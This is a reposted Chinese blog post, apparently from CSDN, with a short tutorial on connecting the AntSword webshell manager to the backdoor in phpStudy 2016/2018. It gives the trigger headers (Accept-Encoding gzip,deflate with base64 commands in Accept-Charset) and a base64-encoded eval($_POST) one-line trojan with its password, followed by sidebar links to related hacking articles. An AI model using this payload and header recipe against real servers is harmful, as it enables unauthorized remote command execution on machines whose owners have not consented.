蚁剑连接php3,利用中国蚁剑无文件连接 phpstudy 后门方法

最新推荐文章于 2024-07-10 23:06:55 发布
最新推荐文章于 2024-07-10 23:06:55 发布
阅读量904 收藏 1
点赞数
文章标签: 蚁剑连接php3

利用中国蚁剑无文件连接 phpstudy 后门方法

0x01 描述

Phpstudy 是一款 PHP 调试环境的程序集成包, 集成了最新的 Apache,PHP,phpMyAdmin,ZendOptimizer 等多款软件一次性安装, 无需配置, 即装即用. 由于其免费且方便的特性, 在国内有着近百万的 PHP 语言学习者, 开发者用户.

后门名称: Phpstudy 后门

威胁等级: 严重

影响范围: Phpstudy 2016,phpstudy2018

后门类型: C&C, 命令执行

利用难度: 极易

0x02 复现

利用工具: 中国蚁剑

phpstudy:2016 PHP-5.4.45

ab7653affab982b574eb7acc55df2e04.gif

Accept-Encoding:gzip,deflate

Accept-Charset:base64 加密执行的命令

一句话木马: ZXZhbCgkX1BPU1RbZ10pOw==

密码: g

配置 HTTP 消息头

ab7653affab982b574eb7acc55df2e04.gif

连接成功

ab7653affab982b574eb7acc55df2e04.gif

来源: http://www.bubuko.com/infodetail-3216509.html

weixin_39872872
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
连接php3,xss漏洞,获取者shell
weixin_39654465的博客
03-10 1073
今日在github上看到暴露了一个xss漏洞,自己也经常使用。同时在freebuf上也有一篇文章,关于漏洞的。闲着没事测试了一波。一、漏洞成因shell远程连接失败时,会返回错误信息,但因为使用的是html解析,导致xss漏洞。用过的童靴都清楚,当我们远程连接写好的webshell的时候,有时候可能因为shell书写错误或者链接填写不当的时候,会出现大堆的错误代码。该信息并...
连接php3,中国蚁剑antSword RCE漏洞,建议所有用户升级
weixin_39935903的博客
03-10 1044
4月12日凌晨,有用户在中国蚁剑GitHub上提交了issue,称发现中国蚁剑存在XSS漏洞,借此可引起RCE。据悉,该漏洞是因为在webshell远程连接失败时,中国蚁剑会返回错误信息,但因为使用的是html解析,导致xss漏洞。当通过中国蚁剑连接webshell,出现连接失败情况时,中国蚁剑会返回错误信息,如下图:而该信息并没有进行 XSS 保护,因此能够利用 js 调用 perl 便可反弹攻...
编码器编写——php木马免杀
最新发布
qq_54030686的博客
07-10 574
马儿要先吃草,然后跑
white_or_abc的博客
05-06 201
百度网盘:https://pan.baidu.com/s/11WCrAYA9tE5rYHjm2oKHpA 提取码:6666 步骤: 1.解压两个压缩包,进入AntSword-Loader-x64\AntSword-Loader-v4.0.3-win32-x64,打开AntSword.exe 2.点击初始化 3.弹出框内选择antSword-2.1.9 4.重新启动。 ...
中国蚁剑的工作原理
无痕的博客
01-12 1838
抓包分析中国蚁剑的工作原理
网安工具系列:中国蚁剑的安装和入门
01-05
中国蚁剑】是一款开源的网络渗透测试工具,主要用于网络安全检测和漏洞利用,它以其便捷的操作界面和强大的功能在网络安全领域受到广泛关注。本教程将详细讲解如何安装和入门使用中国蚁剑。 首先,我们来看安装...
phpstudy隐藏index.php方法
01-19
phpstudy如何隐藏index.php 找到打开 vhosts-ini location / { **if (!-e $request_filename) { rewrite ^/(.*)$ /index.php/$1 last; }** index index.html index.htm index.php; #autoindex on; } 在配置...
phpstudyphp版本自由修改的方法
12-19
网上有着许多的网站集成搭建软件,比较出名的就有wamp,xampp,phpstudy等等 现在就来讲一讲phpstuy的php版本自由切换 安装下载之类的就不说了,http://www.phpstudy.net/ 官网就有,十分简单 看看界面,软件的作者...
phpstudy后门rce批量利用脚本的实现
10-15
本文主要探讨了如何实现针对PHPStudy后门的远程命令执行(RCE)批量利用脚本。PHPStudy是一款集成多种版本的PHP环境管理工具,但有时可能存在安全漏洞,允许攻击者通过特定的HTTP请求执行任意系统命令,这就是所谓的...
PHP文件加密,SG11扩展安装,phpstudy安装SG11
06-23
主要是针对php文件加密,针对SG11扩展安装,适合想要加密php文件的程序员。 针对sg11扩展安装,phpstudy安装扩展如下: 如下为具体安装流程:https://zhuanlan.zhihu.com/p/531679965
.rar (AntSword)
09-16
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。其中一个文件为初始化,一个文件为初始化后需要选择的文件夹。
中国蚁剑MAC版AntSword-Loader-v4.0.3-darwin-x64
08-19
中国蚁剑MAC版AntSword-Loader-v4.0.3-darwin-x64,git下载非常慢。
phpstudy php5.2.17nts 下载
11-08
PHPStudy PHP5.2.17 NTS版本详解及应用》 PHPStudy是一款深受开发者喜爱的PHP集成开发环境,它包含了PHP运行所需的各种组件,为开发者提供了便捷的开发环境搭建服务。此次我们关注的是PHPStudy中的PHP5.2.17 NTS...
PHPStudy-BackDoor-EXP PHPstudy后门利用脚本 (4)
02-23
PHPStudy_BackDoor_EXP PHPstudy后门利用脚本
phpstudy php5.2.17nts版本
09-29
在本文中,我们将详细探讨PHPStudy中的PHP5.2.17 NTS(Non-thread-safe,非线程安全)版本的特性和使用方法。 首先,了解PHP的线程安全和非线程安全。在多线程环境下,线程安全的PHP版本能够确保在并发执行时,数据...
中国蚁剑
qq_40624810的博客
07-07 1285
听老大说菜刀不咋好,让我换个中国蚁剑 https://www.fujieace.com/hacker/tools/antsword.html
使用教程
Vincent0sen的博客
09-14 1440
使用介绍
的分析和利用
qq_53058639的博客
02-19 396
这篇文章主要是以虚拟终端模块执行命令功能为例,逐步分析,并通过分析结果优化对应脚本的方法
phpstudy连接php
05-26
若您想在本地搭建 PHP 开发环境,可以使用 PHPStudy。以下是连接 PHP 和 MySQL 的步骤: 1. 打开 PHPStudy,启动 Apache 和 MySQL 服务。 2. 在浏览器输入 http://localhost/phpmyadmin/ 进入 phpMyAdmin 管理界面...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值